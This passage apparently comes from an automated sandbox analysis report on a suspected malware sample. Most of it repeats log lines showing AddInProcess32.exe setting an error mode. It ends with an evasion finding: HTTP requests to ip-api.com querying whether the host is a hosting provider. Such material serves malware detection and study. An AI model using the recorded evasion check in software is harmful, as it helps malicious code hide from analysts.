                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
